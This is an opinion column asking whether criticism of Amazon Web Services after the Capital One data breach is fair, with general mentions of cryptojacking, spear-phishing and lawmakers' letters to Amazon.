Is post-Capital One breach criticism of Amazon fair?

The recent Capital One data breach allegedly perpetrated by a single American hacker from the Pacific Northwest named Paige A. Thompson, was just the most recent in a long successive line of penetrations that have exposed vulnerabilities within perhaps the largest systems business in the world, Amazon Web Services. 

It has been widely speculated that the fact that Thompson was a former employee of Amazon led her to possess insider information that facilitated her ability to pull off such a massive crime. AWS, through its spokesman Grant Milne, claims that the “vulnerability is not specific to the cloud,” and that their systems were not compromised as part of the hack. 

Amazon Web Services, with its different features and services that it delivers to millions of customers on its public cloud, now boasts an annualized run rate of over $30 billion. Hundreds of millions of internet users interact with AWS in one capacity or another on a daily basis. 

The Capital One hack was particularly sensational based on the sensitivity of the information captured, as well as the sheer number of people affected. The credit limits, credit scores, payment history, contact information, and available balances of over 100 million Americans and approximately six million Canadians are now thought to be floating around in the black market known as the so-called “Dark Web.”

AWS and Amazon CEO Jeff Bezos have a major problem. Everyone from this writer to several departments and agencies within the U.S. government to the National Enquirer  (the same National Enquirer that Bezos accused of trying to extort and blackmail him), appears to host their websites and elements of their cloud computing on the servers of AWS.

It has become a point of contention in Washington as lawmakers are now demanding answers. Last week, the senior senator from Oregon, Democrat Ron Wyden, sent a letter to Bezos asking for Amazon to explain its role in the hack and to give more information as to whether vulnerabilities in the company’s cloud services had anything to do with it.

This came on the heels of the previous week’s letters from the House Oversight Committee, addressed to both Amazon Web Services and Capital One, requesting to be fully briefed on the incident and requesting more details on the companies’ security protocols. In the Amazon letter, the lawmakers cited the potential JEDI award, a 10-year, $10 billion Joint Enterprise Defense Infrastructure contract that may potentially be awarded to either AWS or Microsoft, writing that “the Committee may carefully examine the consequences of this breach.”

While it’s easy to pick on Bezos and Amazon over this, it speaks to a larger problem for providers of web hosting and cloud services. Just last February, an outbreak of widespread cryptojacking occurred against hundreds of well trafficked websites hosted by AWS.

Cryptojacking is the act of infiltrating an unsuspecting victims’ computer via a JavaScript code that utilizes the infected computer’s resources to unleash the cryptocurrency mining power of the affected CPU. This type of hacking incident is particularly insidious in that unlike typical malware and ransomware infections that are immediately apparent, cryptojacking is not noticed by victims until they receive a bill from their utility company showing a major electricity usage spike. 

According to Digiconomist, it requires approximately 215 kilowatt-hours (KWh), or roughly one week’s usage for the average family, to process just one Bitcoin transaction. Based on statistical averages, American households generally consume around 901 KWh per month.

Hacks like the Capital One incident inspires fear and finger-pointing among legislators who are mostly ignorant regarding cloud security and matters relating to general cybersecurity. They tend to attack the top players like Bezos while failing to realize that many attacks are the result of human error and not the result of system flaws. An example of this would be the recent malware attack against three American utilities providers carried out by employing the use of a spear-phishing campaign that infected the companies with Lookback malware. This is further proof that it is next to impossible to build an impenetrable system regardless the monetary or manpower investment. 

Government entities and the private sector would all stand to benefit from a proactive and communal approach to these matters that can potentially affect hundreds of millions of online Americans at any moment then by grandstanding and blame shifting to satisfy their own vanity.